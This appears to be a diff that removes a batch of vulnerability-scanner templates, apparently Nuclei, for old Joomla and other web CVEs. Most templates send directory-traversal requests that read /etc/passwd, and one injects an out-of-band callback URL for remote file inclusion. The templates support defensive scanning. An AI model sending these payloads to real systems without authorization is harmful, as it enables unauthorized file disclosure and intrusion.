description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/9706
|
||||
- https://www.cvedetails.com/cve/CVE-2009-3318
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2009-4202
|
||||
|
||||
info:
|
||||
name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8870
|
||||
- https://www.cvedetails.com/cve/CVE-2009-4202
|
||||
tags: cve,cve2009,joomla,lfi,photo
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,26 +0,0 @@
|
|||
id: CVE-2009-4223
|
||||
|
||||
info:
|
||||
name: KR-Web <= 1.1b2 RFI
|
||||
description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents.
|
||||
reference:
|
||||
- https://sourceforge.net/projects/krw/
|
||||
- https://www.exploit-db.com/exploits/10216
|
||||
author: geeknik
|
||||
severity: high
|
||||
tags: cve,cve2009,krweb,rfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2009-4679
|
||||
|
||||
info:
|
||||
name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/33440
|
||||
- https://www.cvedetails.com/cve/CVE-2009-4679
|
||||
tags: cve,cve2009,joomla,lfi,nexus
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2009-5114
|
||||
|
||||
info:
|
||||
name: WebGlimpse 2.18.7 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/36994
|
||||
- https://www.cvedetails.com/cve/CVE-2009-5114
|
||||
tags: cve,cve2009,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-0157
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_biblestudy - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10943
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0157
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,32 +0,0 @@
|
|||
id: CVE-2010-0467
|
||||
|
||||
info:
|
||||
name: Joomla! Component CCNewsLetter - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/11282
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0467
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
|
||||
cvss-score: 5.80
|
||||
cve-id: CVE-2010-0467
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-0696
|
||||
|
||||
info:
|
||||
name: Joomla! Component Jw_allVideos - Arbitrary File Download
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11447
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0696
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-0759
|
||||
|
||||
info:
|
||||
name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11498
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0759
|
||||
tags: cve,cve2010,joomla,lfi,plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-0942
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jvideodirect - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11089
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0942
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-0943
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jashowcase - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11090
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0943
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-0944
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jcollection - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11088
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0944
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-0972
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11738
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0972
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-0982
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_cartweberp - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10942
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0982
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-0985
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_abbrev - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10948
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0985
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1056
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_rokdownloads - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11760
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1056
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1081
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11511
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1081
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1217
|
||||
|
||||
info:
|
||||
name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11814
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1217
|
||||
tags: cve,cve2010,joomla,lfi,plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,26 +0,0 @@
|
|||
id: CVE-2010-1219
|
||||
info:
|
||||
name: Joomla! Component com_janews - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11757
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1219
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1302
|
||||
|
||||
info:
|
||||
name: Joomla! Component DW Graph - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11978
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1302
|
||||
tags: cve,cve2010,joomla,lfi,graph
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1304
|
||||
|
||||
info:
|
||||
name: Joomla! Component User Status - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11998
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1304
|
||||
tags: cve,cve2010,joomla,lfi,status
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1305
|
||||
|
||||
info:
|
||||
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12065
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1305
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1306
|
||||
|
||||
info:
|
||||
name: Joomla! Component Picasa 2.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12058
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1306
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1307
|
||||
|
||||
info:
|
||||
name: Joomla! Component Magic Updater - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12070
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1307
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1308
|
||||
|
||||
info:
|
||||
name: Joomla! Component SVMap 1.1.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12066
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1308
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1312
|
||||
|
||||
info:
|
||||
name: Joomla! Component News Portal 1.5.x - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12077
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1312
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1313
|
||||
|
||||
info:
|
||||
name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12082
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1313
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,27 +0,0 @@
|
|||
id: CVE-2010-1314
|
||||
|
||||
info:
|
||||
name: Joomla! Component Highslide 1.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12086
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1314
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|